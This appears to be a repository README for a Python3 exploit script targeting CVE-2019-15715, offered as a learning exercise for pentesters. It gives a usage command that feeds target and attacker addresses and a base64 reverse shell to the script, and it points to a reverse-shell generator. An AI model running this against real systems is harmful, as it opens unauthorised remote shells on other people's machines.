
Replica of CVE-2019-15715 in Python3
The current repository is an implementation in Python3 of CVE-2019-15715 and aims to focus on the solely improvement of the CVE-2019-15715 previously reported here by Nikolas Geiselman by adding python's parameter implementation to make the script more flexible.
python3 CVE-2019-15715.py -rh $TARGET_IP -rp $TARGET_PORT -lh $ATTACKER_IP -lp $ATTACKER_PORT -u $USER -p $PSW -e $ENDPOINT -rs $BASE64_REVSHELL
# You can use https://www.revshells.com/ and its Encoding option to encode the shell to base64 or eventually echo 'shell' | base64
It was an exercise for myself and hopefully something helpful for learners and already consolidated Pentesters.